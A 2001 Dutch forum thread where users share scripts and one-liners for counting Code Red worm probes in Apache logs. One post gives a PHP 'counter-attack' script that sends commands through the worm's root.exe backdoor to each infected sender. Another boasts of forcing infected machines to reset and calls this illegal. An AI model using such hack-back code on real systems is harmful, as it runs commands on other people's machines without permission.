Toon posts:

Code Red... Script

Pagina: 1
Acties:
  • 158 views sinds 30-01-2008
  • Reageer

Verwijderd

Topicstarter
Voor de lief hebbers
Ik heb een script gemaakt voor de Code Red Aanvallen. Hij kijkt in de laatste httpd log file. En geeft een output hoeveel aanvallen er zijn geweest,

Het is een shell script, met meta tags, voor een web server,

Kijk op www.zix.nu hoe hij werkt, ook hier kan je de source downloaden.


Greetz,
Tha Insane

  • Prozaq
  • Registratie: Juni 2000
  • Laatst online: 06-08 13:03
die van rick jansen is mooier :P

  • Theuno
  • Registratie: Juni 2001
  • Laatst online: 00:44

Theuno

Da Devil Crew

ik ben blij dat ik niet weet hoeveel het er zijn...
of gaan we een wedstrijdje doen wie er het meest krijgt ? :)

Theuno - Da Devil Crew - Een programmeur is iemand die koffie omzet in software...
Nu nog betere koffie...


Verwijderd

Hier draait er ook eentje. Een lekker lompe berg code, maar goed, het is en blijft Perl :)

  • RvdH
  • Registratie: Juni 1999
  • Laatst online: 28-07 15:42

RvdH

Uitvinder van RickRAID

Op dinsdag 07 augustus 2001 22:43 schreef semtx het volgende:
Voor de lief hebbers
Ik heb een script gemaakt voor de Code Red Aanvallen. Hij kijkt in de laatste httpd log file. En geeft een output hoeveel aanvallen er zijn geweest,

Het is een shell script, met meta tags, voor een web server,

Kijk op www.zix.nu hoe hij werkt, ook hier kan je de source downloaden.


Greetz,
Tha Insane
Waarom roep je een $XXX en $NNN aan als die niet bestaan :? (Zie source)

  • bras
  • Registratie: Oktober 2000
  • Laatst online: 13-08 14:08
%cat /var/log/httpd-access.log | grep default.ida | wc -l
726
%

ze zijn weer druk bezig >:)

"When you find yourself in the company of a halfling and an ill-tempered Dragon, remember, you do not have to outrun the Dragon...you just have to outrun the halfling."


  • MAZZA
  • Registratie: Januari 2000
  • Laatst online: 17-08 14:00

MAZZA

Barbie is er weer!

Ik heb ook zoiets draaien maar dan in PHP. Daarvan kan je hier een voorbeeldje zien:

http://maztrix.yi.org/codered.php

En hier is voor de liefhebber de source:
http://maztrix.yi.org/codered.phps

  • Tjark
  • Registratie: Juni 2000
  • Laatst online: 21:37

Tjark

DON'T PANIC

leuk, maar die werkt nog niet goed: ik zie bij codered 2 dezelfde staan als bij codered 1 :o

btw: ik zat vanmiddag pas op 97

-update- 101

*insert signature here


  • MAZZA
  • Registratie: Januari 2000
  • Laatst online: 17-08 14:00

MAZZA

Barbie is er weer!

Op woensdag 08 augustus 2001 02:15 schreef TjarkVerhoeven het volgende:
leuk, maar die werkt nog niet goed: ik zie bij codered 2 dezelfde staan als bij codered 1 :o

btw: ik zat vanmiddag pas op 97

-update- 101
Stom stom stom |:( Maar gefixt :)

Verwijderd

[rbultje@gizmo logs]$ cat *access* | grep default.ida | wc -l
222
[rbultje@gizmo logs]$

:?

edit:

Hier mijn broers server, eergister geinstalleerd (!!!!!)

bash$ cat *access* | grep default.ida | wc -l
1455
bash$

1500 bijna, in nog geen twee dagen. |:(

  • Tjark
  • Registratie: Juni 2000
  • Laatst online: 21:37

Tjark

DON'T PANIC

zo... populair ip-nummer heeft ie ;)

*insert signature here


Verwijderd

Op woensdag 08 augustus 2001 09:19 schreef TjarkVerhoeven het volgende:
zo... populair ip-nummer heeft ie ;)
Ja...
Maar of we daar blij van worden is weer iets anders.... |:(

Verwijderd

Ik gebruik dat scriptje van Rick. Wel een klein beetje verbouwdt zodat die een tabelletje uitpoept maar voor de rest hetzelfde.

Te vinden op http://mbweb.nu eerst klikken op 'stats' en daarna op 'aantal Code Red aanvallen'

Zit alweer op 829 met iets van 10 per uur op dit moment. 8-)

  • imdos
  • Registratie: Maart 2000
  • Laatst online: 05-08 12:09

imdos

I use FreeNAS and Ubuntu

zo ... jullie zijn populair :P

ik heb pas 428 XXXXX en 136 NNNNN

Moet ik me nu achtergesteld voelen (8> :?

pvoutput. Waarom makkelijk doen, als het ook moeilijk kan! Every solution has a new problem


  • chem
  • Registratie: Oktober 2000
  • Laatst online: 04-08 07:59

chem

Reist de wereld rond

thuis server 400, server van bedrijf 2450

Klaar voor een nieuwe uitdaging.


Verwijderd

Mijn broer alweer op 1582...

Dus in 7 1/2 uur ruim 200........... Dat is ongeveer 30 per uur.....

|:( |:( |:(

  • Valium
  • Registratie: Oktober 1999
  • Laatst online: 09-08 08:59

Valium

- rustig maar -

Op dinsdag 07 augustus 2001 22:52 had Theuno een goed voorstel:
ik ben blij dat ik niet weet hoeveel het er zijn...of gaan we een wedstrijdje doen wie er het meest krijgt ? :)
Ja ja ja....ik wil ook meedoen: 434 :Y)

* Valium voelt zich stukken beter nu hij meedoet

  • TriLithium
  • Registratie: December 1999
  • Laatst online: 16-08 16:12

TriLithium

7800Wp E/W + 7.5 kW Ecodan

ach mag ik ook meedoen: 1695, irritant

  • serkoon
  • Registratie: April 2000
  • Niet online

serkoon

mekker.

Doe dan iets als:

cat httpd-access.log | grep default.ida | awk '{print $1}' | sort | uniq | wc -l

(Er worden nl meerdere pogingen door dezelfde pctjes gedaan)

  • Wierdo_NL
  • Registratie: Mei 2000
  • Laatst online: 08-08 19:03
:( Is er ook zoiets voor NT ( want in de logs bij mij staat een hele zooi XXXXXXXXXXXXXXXX )

Soms krijg ik het 4 keer per minuut binnen.

There is a fine line between hobby and mentaldisorder


Verwijderd

Op woensdag 08 augustus 2001 17:03 schreef serkoon het volgende:
Doe dan iets als:

cat httpd-access.log | grep default.ida | awk '{print $1}' | sort | uniq | wc -l

(Er worden nl meerdere pogingen door dezelfde pctjes gedaan)
imho is een poging een poging, of deze nu 100x van dezelfde pc afkomt of niet, t blijft een poging

  • chem
  • Registratie: Oktober 2000
  • Laatst online: 04-08 07:59

chem

Reist de wereld rond

er schijnt wel een patch voor NT te bestaan jah, heet linux geloof ik ;)

Klaar voor een nieuwe uitdaging.


  • Wierdo_NL
  • Registratie: Mei 2000
  • Laatst online: 08-08 19:03
Maar niemand die iets heeft om onder NT net zo iets te krijgen ??

There is a fine line between hobby and mentaldisorder


Verwijderd

Op woensdag 08 augustus 2001 17:04 schreef Wierdo_NL het volgende:
:( Is er ook zoiets voor NT ( want in de logs bij mij staat een hele zooi XXXXXXXXXXXXXXXX )

Soms krijg ik het 4 keer per minuut binnen.
JA logfile openenen en handmatig gaan tellen :+
Nee, ik zou zo niet durven zeggen of er iets voor NT is.
De CLI van Linux is nogal wat krachtiger, zoals je kan zien.

Zit inmiddels ook op 1027.

Verwijderd

Hier nog ene link naar de server hier thuis en geprogrammeerd door mijn huisgenoot. De data zoals aantal andere scripts vanuit Apache log file, check this: http://www.vylix.com/codered.php

  • Tjark
  • Registratie: Juni 2000
  • Laatst online: 21:37

Tjark

DON'T PANIC

Op woensdag 08 augustus 2001 17:19 schreef Wierdo_NL het volgende:
Maar niemand die iets heeft om onder NT net zo iets te krijgen ??
Download de GNU utilities voor win32 en dan kun je onder cmd zoiets doen als:
code:
1
2
grep default.ida | grep NNNNN | wc
grep default.ida | grep XXXXX | wc

Je zou er zo een ASP paginaatje omheen kunnen bouwen.

*insert signature here


Verwijderd

waar ken ik die bescherming tegen codered downen ?

Verwijderd

lol, thx....ben een n00b :)

Verwijderd

You're welcome just helping out 8-)

Verwijderd

You're welcome just helping out 8-)

Check this page: http://www.vylix.com/codered.php

  • Freez
  • Registratie: November 2000
  • Laatst online: 19-08 10:13
ik heb al attacks vanaf 19 juli, en ik heb blijkbaar een populair ip: 3681 attacks totaal al :)

maar gelukkig draai ik geen IIS maar apache op m'n NT machine >:)

  • Apache
  • Registratie: Juli 2000
  • Laatst online: 17-08 14:28

Apache

amateur software devver

Eerste worm (XXXXXX): 0
Tweede worm (NNNNNN): 4071
Totaal: 4071


|:(

blijkbaar draaien er bij m'n isp teveel mensen win2K, maar sinds poort 80 geblokt staat voor de buitenwereld moet iemand binnenin onze provider er mee begonnen zijn >:)

http://bserver.dhs.org:4000/~blacky/codered.php

If it ain't broken it doesn't have enough features


Verwijderd

Op woensdag 08 augustus 2001 20:13 schreef InSaNe400 het volgende:

You're welcome just helping out 8-)



Check this page: http://www.vylix.com/codered.php
Euhm ik denk dat 1 keer een link noemen in een thread meer dan genoeg is, anders gaat het in de categorie "spam" vallen ;)

  • Prozaq
  • Registratie: Juni 2000
  • Laatst online: 06-08 13:03
Op woensdag 08 augustus 2001 20:21 schreef Apache het volgende:
Eerste worm (XXXXXX): 0
Tweede worm (NNNNNN): 4071
Totaal: 4071


|:(

blijkbaar draaien er bij m'n isp teveel mensen win2K, maar sinds poort 80 geblokt staat voor de buitenwereld moet iemand binnenin onze provider er mee begonnen zijn >:)

http://bserver.dhs.org:4000/~blacky/codered.php
vreemd, want die xxxxx variant is agressiever en komt meer voor

  • Prozaq
  • Registratie: Juni 2000
  • Laatst online: 06-08 13:03
Op woensdag 08 augustus 2001 20:13 schreef InSaNe400 het volgende:
You're welcome just helping out 8-)

Check this page: http://www.vylix.com/codered.php
En ik sta nou lekker ook in je rijtje :P

Verwijderd

Op woensdag 08 augustus 2001 20:26 schreef Prozaq het volgende:
[..]

En ik sta nou lekker ook in je rijtje :P
|:( ;) :)

[edit]
newlines verwijderd.
/me wordt gek van Opera op GOT :(

Verwijderd

THNX ben je grote jongen zorg liever dat je een van de weinige bent die hem niet verspreid, dit is wel beetje triest.

Verwijderd

yawn
gimme a good firewall & virus scanner
dag Code Red

  • Sir Abarth
  • Registratie: Juni 2000
  • Laatst online: 18-01-2024

Sir Abarth

The secret word is: ToeT!

Op woensdag 08 augustus 2001 17:04 schreef Wierdo_NL het volgende:
:( Is er ook zoiets voor NT ( want in de logs bij mij staat een hele zooi XXXXXXXXXXXXXXXX )

Soms krijg ik het 4 keer per minuut binnen.
code:
1
type *.log | find /c "default.ida"

voor totaal aantal, en
code:
1
find *.log /c "default.ida"

voor per logfile. (wel naar de logdir cd'en)
Je kunt een beetje rondspelen met de searchstring natuurlijk :)
(btw, waarom nu weer een nagemaakte/gepoorte grep voor NT installen? Ken je DOS commando's/proggies! :) )

ToeTerdeToeTToeT! | May the ToeT be with you | There is no ToeT | specs
Still the gentleman ;)
[Clan of ToeT]


Verwijderd

Op woensdag 08 augustus 2001 20:32 schreef Ev!L-c het volgende:
yawn
gimme a good firewall & virus scanner
dag Code Red
Je kan ook beginnen met een goede webserver >:)

Verwijderd

yups k'heb Avx en sygate personal firewall 4.1 (gratis) en Blackice defender dus er komt geen Code Red of SirCam worm hier binnen

Verwijderd

Toevallig geen IIS?

Verwijderd

Op woensdag 08 augustus 2001 20:41 schreef Ev!L-c het volgende:

yups k'heb Avx en sygate personal firewall 4.1 (gratis) en Blackice defender dus er komt geen Code Red of SirCam worm hier binnen
Ik en met mij vele mensen in dit draadje hebben geen virusscanner. Explain that >:)

Verwijderd

Nelske maakt vast gebruik van een leuke Unix variant en opent niet ieder attachment bij zijn mail en draait goede router 8-)

  • Prozaq
  • Registratie: Juni 2000
  • Laatst online: 06-08 13:03
Op woensdag 08 augustus 2001 20:30 schreef InSaNe400 het volgende:
THNX ben je grote jongen zorg liever dat je een van de weinige bent die hem niet verspreid, dit is wel beetje triest.
goeiendag zeg. Wil je zeggen dat ik je iis nu heb geinfecteerd met code red dan :? if so, waarom ben je dan zo trots op je statjes?

wees niet bang dat ik het verspreid, dit is NOS weet je nog?

Verwijderd

Just kidding en Apache wordt tot nu toe nog nie geïnfecteerd en als je alles gelezen had dan had je allang geweten waar die data vandaan komt en dat is dus niet IIS en ik ben zelf niet bang voor besmetting maar wel dat andere mensen die IIS nog niet gepatched hebben er door besmet raken en zo nog meer teringzooi het internet op knallen. Vandaar

  • Consequator
  • Registratie: Juli 2000
  • Laatst online: 03-08 09:15
[root@invision /root]# grep -c default\.ida /var/log/httpd/access_log*
/var/log/httpd/access_log:796
/var/log/httpd/access_log.1:113
/var/log/httpd/access_log.2:0
/var/log/httpd/access_log.3:29
/var/log/httpd/access_log.4:0
[root@invision /root]#
*D

Verwijderd

Op woensdag 08 augustus 2001 20:47 schreef InSaNe400 het volgende:


Nelske maakt vast gebruik van een leuke Unix variant en opent niet ieder attachment bij zijn mail en draait goede router 8-)
Yep en onder linux durf ik ook nog wel atetsjmentjes te openen ;)
Op woensdag 08 augustus 2001 20:50 schreef Prozaq het volgende:

[..]

goeiendag zeg. Wil je zeggen dat ik je iis nu heb geinfecteerd met code red dan :? if so, waarom ben je dan zo trots op je statjes?

wees niet bang dat ik het verspreid, dit is NOS weet je nog?
/me wist dat wel ;) , vandaar ook mijn eerdere reactie op jouw post :)

  • jelmervos
  • Registratie: Oktober 2000
  • Niet online

jelmervos

Simple user

Mag ik ook meedoen? :? :)
code:
1
2
3
4
5
Apache/1.3.20 (Unix) PHP/4.0.6

Eerste worm (XXXXXX):  141 
Tweede worm (NNNNNN):  1276 
Totaal:  1417

"The shell stopped unexpectedly and Explorer.exe was restarted."


Verwijderd

Topicstarter
Die van mij ging gister erug hard, maar vandaag niet zo...

Volgens mij moeten we er maar een sport van maken......

Greetz,
Tha Insane

  • blouweKip
  • Registratie: November 1999
  • Laatst online: 10-08 18:05
"This sytem has been attacked this month by the Code Red worm a total of : 533 times.

Out of the above number a total of 204 were from unquie ips"

Dan valt t bij mij nog wel mee dus...

"For my friends, anything; for my enemies, the law."


Verwijderd

Weer update van het script nu nog beter, check: http://www.vylix.com/codered.php

  • Koffie
  • Registratie: Augustus 2000
  • Laatst online: 22:47

Koffie

Koffiebierbrouwer

Braaimeneer

Waarom heeft iedereen zo weinig 'hits' ?
Ik ben al meer dan 1000 (!!) keer gescaned.
Allee kan ik nu remote niet meer dan 1000 entries op vragen in de log.

* Koffie begint het virus nu wel weer zat te worden

Braaikamer - Smoke&BBQ


  • chem
  • Registratie: Oktober 2000
  • Laatst online: 04-08 07:59

chem

Reist de wereld rond

Op woensdag 08 augustus 2001 14:14 schreef chem het volgende:
thuis server 400, server van bedrijf 2450
vandaag thuis:
code:
1
2
michiel@jimbob:~$ cat /www/logs/access_log | grep default.ida | wc -l
    444

werk:
code:
1
2
phobos:~$ locate access_log | xargs grep default.ida | wc -l
   2744

het neemt al af iig bij mij...

Klaar voor een nieuwe uitdaging.


Verwijderd

Heb ik het record? :P
code:
1
2
3
4
5
[root@home logs]# cat * | grep default.ida | wc -l
   3849

[root@nivedita logs]# cat * | grep default.ida | wc -l
  11498

  • Tjark
  • Registratie: Juni 2000
  • Laatst online: 21:37

Tjark

DON'T PANIC

Op woensdag 08 augustus 2001 20:37 schreef Sir Abarth het volgende:

[..]btw, waarom nu weer een nagemaakte/gepoorte grep voor NT installen? Ken je DOS commando's/proggies! :)
erm ja... de laatste tijd zoveel meer bezig met unix dat dit me eerder te binnen schoot :o

*insert signature here


Verwijderd

Op donderdag 09 augustus 2001 10:33 schreef Koffie het volgende:
Waarom heeft iedereen zo weinig 'hits' ?
Ik ben al meer dan 1000 (!!) keer gescaned.
Allee kan ik nu remote niet meer dan 1000 entries op vragen in de log.

* Koffie begint het virus nu wel weer zat te worden
uhh ik weten niet wat jij onder weinig verstaat, maar ik inmiddels meer dan 1700 hits gehad op me thuis servertje...
( http://www.skinner.ath.cx/code_red_stats.html )

en de 'hit-rate' neemt niet bepaald af.

  • chem
  • Registratie: Oktober 2000
  • Laatst online: 04-08 07:59

chem

Reist de wereld rond

Op donderdag 09 augustus 2001 10:48 schreef [nielsonline] het volgende:
Heb ik het record? :P
code:
1
2
3
4
5
[root@home logs]# cat * | grep default.ida | wc -l
   3849

[root@nivedita logs]# cat * | grep default.ida | wc -l
  11498
hey dude, default.ida staat in zowel error_log en access_log he ;) dus waarschijnlijk moet je die 2 getallen /2 doen >:)

Klaar voor een nieuwe uitdaging.


  • MAZZA
  • Registratie: Januari 2000
  • Laatst online: 17-08 14:00

MAZZA

Barbie is er weer!

Op donderdag 09 augustus 2001 12:36 schreef chem het volgende:

[..]

hey dude, default.ida staat in zowel error_log en access_log he ;) dus waarschijnlijk moet je die 2 getallen /2 doen >:)
Mjah pcies als ik dat zo doe kom ik uit op:
code:
1
2
cat * | grep default.ida | wc -l
   1749

Terwijl het er in werkelijkheid zoveel zijn:
code:
1
2
3
4
Total 'NNNN' (CodeRed I) probes:  469
Total 'XXXX' (CodeRed II) probes: 177
Total probes combined: 646
Totaal aantal unieke hosts: 444

Verwijderd

Op woensdag 08 augustus 2001 20:41 schreef Ev!L-c het volgende:
yups k'heb Avx en sygate personal firewall 4.1 (gratis) en Blackice defender dus er komt geen Code Red of SirCam worm hier binnen
Mag ik dit als domste opmerking van de thread bestempelen? :)

/me krijgt ideeen voor een hall-of-shame ofzoiets :P

Verwijderd

Op donderdag 09 augustus 2001 12:36 schreef chem het volgende:

[..]

hey dude, default.ida staat in zowel error_log en access_log he ;) dus waarschijnlijk moet je die 2 getallen /2 doen >:)
daarom doe ik ook cat *access* :P

Kleine update:
[rbultje@gizmo rbultje]$ cat /var/www/logs/*access* | grep default.ida | wc -l
279
[rbultje@gizmo rbultje]$

bash$ cat /var/www/logs/*access* | grep default.ida | wc -l
1904
bash$

Blijft een leuke worm :D
Als je erover nadenkt, 1000 aanvallen per computer is verschrikkelijk veel.... :\
Een virus waarvoor *geen* patch bestaat en het halve internet ligt opeens plat (!!!) omdat al die domme IIS servers zo veilig zijn... |:(

  • CBA
  • Registratie: November 2000
  • Laatst online: 22:05

CBA

een vat, een vat, een vat !

Op donderdag 09 augustus 2001 07:58 schreef InSaNe400 het volgende:
Weer update van het script nu nog beter, check: http://www.vylix.com/codered.php
Kan je ff dat scriptje doormailen naar me ?
bart@gl.be

Thnx

Diablo 3 Profiel - WoW Warrior


  • Mart!
  • Registratie: Februari 2000
  • Laatst online: 14-08 11:48
Heeft iemand misschien ook nog mooie grafiekjes? Nu krijg je alleen maar een indruk van totalen! zou wel tof zijn als iemand per dag kan laten zien hoeveel of zo?
Als ik wist hoe ik het met ASP kon doen (ideeen zijn welkom), dan wilde ik m'n eigen logs ook wel ff parsen....

  • Sir Abarth
  • Registratie: Juni 2000
  • Laatst online: 18-01-2024

Sir Abarth

The secret word is: ToeT!

Op donderdag 09 augustus 2001 11:58 schreef TjarkVerhoeven het volgende:

[..]

erm ja... de laatste tijd zoveel meer bezig met unix dat dit me eerder te binnen schoot :o
Tis ook niet echt het windows hoekje hier ;)

ToeTerdeToeTToeT! | May the ToeT be with you | There is no ToeT | specs
Still the gentleman ;)
[Clan of ToeT]


Verwijderd

Het wordt steeds mooier, er zijn ook (MS)hotmail servers besmet.

Zie slashdot

Verwijderd

Op donderdag 09 augustus 2001 07:58 schreef InSaNe400 het volgende:
Weer update van het script nu nog beter, check: http://www.vylix.com/codered.php
Mijn god wat een hoop chello :P

Je mag toch helemaal geen webservertje draaien bij chello.... :D >:) ;)

Verwijderd

Op donderdag 09 augustus 2001 19:39 schreef BlackHawk het volgende:
[..]
Mijn god wat een hoop chello :P
Je mag toch helemaal geen webservertje draaien bij chello.... :D >:) ;)
De worm heeft een voorkeur voor het eigen netwerk, en aangezien het verzamelen van deze info volgens mij op een computer op het chello netwerk plaatsvindt is het dus logisch dat je veel chello adressen ziet.

Verder hoorde ik dat die webserver standaard geinstalleerd (en geactiveerd) wordt bij w2k, terwijl de meeste gebruikers van het bestaan ervan op hun computer niet eens af zullen weten. Weet iemand uit eerste hand of dat echt gebeurt?

Verwijderd

Verder hoorde ik dat die webserver standaard geinstalleerd (en geactiveerd) wordt bij w2k, terwijl de meeste gebruikers van het bestaan ervan op hun computer niet eens af zullen weten. Weet iemand uit eerste hand of dat echt gebeurt?
Bij de Windows 2000 Server versies wordt 'ie automatisch geinstalleerd bij een 'typical install', bij een 'custom install' kun je kiezen.
Bij Windows 2000 Professional moet je de uitgeklede versie van IIS (PWS, Personal Web Server) apart installeren.

De kans dat iemand thuis een IIS-versie draait zonder 't te weten is erg klein...

Verwijderd

Jup, dat heb je goed, draai hier Pro en standaard staat er gelukkig een boel uit.
De server via Chello (oej, mag dat wel? ) logt wel leuk zo en infecteren was toch nie gelukt want daarvoor update ik te vaak (die patch is toch al redelijk lang beschikbaar of ben ik abuis?).
Check http://www.vylix.com/codered.php , helaas zonder grafiek maar wel lekker duidelijk.

  • veldmuis
  • Registratie: Mei 2001
  • Niet online
Op donderdag 09 augustus 2001 12:55 schreef beelzebubu het volgende:

[..]

Mag ik dit als domste opmerking van de thread bestempelen? :)

/me krijgt ideeen voor een hall-of-shame ofzoiets :P
WHHAHHAHAH
blackice, en geen worm die binnenkomt
hmm die andere is nog ietsie beter, maar ook niet duidelijk echt goed ofzo :+

en die hall of shape is idd een strak plan

GoT's HoS
http://hos.tweakers.net ;) :7

Verwijderd

Code Red II aanvallen : 1821
Code Red I aanvallen : 129

Verwijderd

Op donderdag 09 augustus 2001 21:38 schreef Afterlife het volgende:
[..]
Bij de Windows 2000 Server versies wordt 'ie automatisch geinstalleerd bij een 'typical install', bij een 'custom install' kun je kiezen.
Bij Windows 2000 Professional moet je de uitgeklede versie van IIS (PWS, Personal Web Server) apart installeren.

De kans dat iemand thuis een IIS-versie draait zonder 't te weten is erg klein...
Ok, dat zou dan meevallen.

Wat wel opvalt is dat op vele van de IPs die ik in mijn logs zie de home-pagina een standaard microsoft "Under construction" pagina is. Soms nederlands, duits, engels, maar verder gelijk. Dat lijkt toch op mensen die de webserver wel hebben geinstalleerd, maar niet gebruiken.

  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Omdat er in C!T of (nog erger) CiD een keer een stukkie heeft gestaan dat IIS makkelijk te installaeren was voor je eigen hoompeets |:(

En ga maar eens [search=windows webserver] , er komt regelmatig de kreet IIS voorbij 'want die zit er toch al bij'.

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device


  • Johannes Verelst
  • Registratie: Februari 2001
  • Laatst online: 14-11-2022
Ik heb hier een stukje code om je apache server (of IIS natuurlijk .. ;-) met php wat nuttigs te laten doen:
code:
1
2
3
4
<?
$dummy = file('http://'.getenv("REMOTE_ADDR"). '/scripts/root.exe?%2Fc+net+send+%25computername%25+This+machine+has+the+CODE+RED+II+worm%2C+please+shut+down+immediately+and+then+take+appropriate+measures%21%20See%20http%3A%2F%2Fvil.mcafee.com%2FdispVirus.asp%3Fvirus_k%3D99177%26');
}
?>

Sla dit op in 'default.ida' en doeAddType application/x-httpd-php .ida
in je httpd.conf

Nu krijg iedereen die achter een PC zit met CodeRed (II in ieder geval, ik weet niet of het ook met CrV1 & CrV2 werkt) een popup dat hij geinfecteerd is.

Ik heb er al 5 verstuurd in een paar uur (m'n ip adres is niet zo populair blijkbaar ... het kan ook zijn dat alle IIS dozen hier op de campus al gefixed zijn)

There are no stupid questions, but there are a lot of inquisitive idiots.


  • MAZZA
  • Registratie: Januari 2000
  • Laatst online: 17-08 14:00

MAZZA

Barbie is er weer!

Dat ga ik maar eens doen dan :9

Mijn tussenstand is trouwens:

Totaal 'NNNN' (CodeRed I) probes: 516
Totaal 'XXXX' (CodeRed II) probes: 178
Totaal probes samen: 694
Totaal aantal unieke hosts: 478

Verwijderd

Op donderdag 09 augustus 2001 21:49 schreef ikbenveldmuis het volgende:
WHHAHHAHAH
blackice, en geen worm die binnenkomt
Dit was een geintje, he?
Zeg ja, alsjeblieft.... Anders ben jij #1 in de hall-of-shame :+

  • GX
  • Registratie: Augustus 2000
  • Laatst online: 14-05-2025

GX

Nee.

hmmm
voor de windows ppl:
PHP:
1
2
3
4
5
6
7
8
9
10
11
12
<?
exec('find /c "default.ida?NNN" "H:\program files\apache group\apache\logs\access.log"',$output);
exec('find /c "default.ida?XXX" "H:\program files\apache group\apache\logs\access.log"',$output);

$ding2 = explode(":",$output[1]);
$ding = explode(":",$output[3]);

echo "
Het aantal Code Red XXXXX aanvallen : $ding[2]<br>
Het aantal Code Red NNNNN aanvallen : $ding2[2]
";
?>

Wel ff path aanpassen dus :P

bij mij respectievelijk 460 en 150 aanvallen..

Verwijderd

Topicstarter
Ik ben nu gegroeit naar 2772 aantal.

:)

  • RG
  • Registratie: Augustus 2000
  • Laatst online: 28-11-2025

RG

Lambda

Ik schrok me rot toen ik zag dat op mijn oude server in een paar dagen er al dik 800 attacks waren geweest... Ik dacht dat zijn er hoogstens 5 ofzo... Nu op mijn nieuwe server is het al net zo erg: http://server.elle.dhs.org/codered.php

En dan ga je naar zo'n IP toe en dan hebben ze geeneens een website draaien! ZET DIE SREVER DAN UIT!!!

[deze advertentieruimte is te koop]


  • Ro_meo
  • Registratie: Juni 2001
  • Laatst online: 07:38
op : http://screaming-penguin.com/main.php?storyid=1870
staat een stukje hoe je voor apache/php er wat aan kan doen...

iOS N3rd


  • Mior
  • Registratie: Maart 2000
  • Laatst online: 15-08 00:58
code:
1
2
b0xx:/var/log/httpd# grep default.ida * | grep Aug | sort -u | wc -l
   4843

*zucht*

Verwijderd

Mijn Apache schakelt de hele codered bak gewoon uit. Als jij mijn bandbreedte vreet; dan laat ik jouw bak zichzelf resetten. hihi

Ja het is in principe illegaal, maar dat is het verspreiden van virussen ook; bovendien ik denk niet dat mensen die code red hebben slim genoeg zijn om effe in hun log te kijken waarom hun pc uitschakelde. Al zullen ze na 4 keer hopelijk een virusscanner starten.

Verwijderd

Op vrijdag 10 augustus 2001 00:39 schreef Wizard_of_OS het volgende:
Ik heb hier een stukje code om je apache server (of IIS natuurlijk .. ;-) met php wat nuttigs te laten doen:
code:
1
2
3
4
<?
$dummy = file('http://'.getenv("REMOTE_ADDR"). '/scripts/root.exe?%2Fc+net+send+%25computername%25+This+machine+has+the+CODE+RED+II+worm%2C+please+shut+down+immediately+and+then+take+appropriate+measures%21%20See%20http%3A%2F%2Fvil.mcafee.com%2FdispVirus.asp%3Fvirus_k%3D99177%26');
}
?>

Sla dit op in 'default.ida' en doeAddType application/x-httpd-php .ida
in je httpd.conf

Nu krijg iedereen die achter een PC zit met CodeRed (II in ieder geval, ik weet niet of het ook met CrV1 & CrV2 werkt) een popup dat hij geinfecteerd is.

Ik heb er al 5 verstuurd in een paar uur (m'n ip adres is niet zo populair blijkbaar ... het kan ook zijn dat alle IIS dozen hier op de campus al gefixed zijn)
Hoe kun je checken of dit goed gaat... :)

  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Door een copy van cmd.exe in de scripts dir te zetten misschien (dat doet die payload van CR2 ook toch) ?

Ik ga ut niet testen iig :P

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device


Verwijderd

Nog een http request starten naar jouw server met als bericht: "counter attack geslaagd" dat zie je dan ook terug in je logs. (als hij het bericht terug stuurt, dan heeft ie ook het vorogaande commando uitgevoerd.)

Verwijderd

Topicstarter
Heeft iemand in goede mrtg config voor het counten van Code Red meldingen?

  • capedro
  • Registratie: Oktober 2000
  • Laatst online: 20-05 09:15
Ik heb gewoon een inbelverbinding op mijn linux bak en toch:
code:
1
2
3
root@athos:/usr/firewall > awk '/default.ida/{ print $1}' /var/log/httpd/access*|sort|uniq | wc -l
     24
root@athos:/usr/firewall >

en bij een kennis waarbij ik ook root rechten heb:
code:
1
2
3
bash-2.04# awk '/default.ida/{ print $1}' /var/log/httpd/access*|sort|uniq | wc -l
    818
bash-2.04#

My weblog


Verwijderd

Een bak waar ik een aantal websites op draai:

awk '/default.ida/{ print $1}' ./*access*|sort|uniq|wc -l
5303

en thuis:

awk '/default.ida/{ print $1}' ./*access*|sort|uniq|wc -l
679
Pagina: 1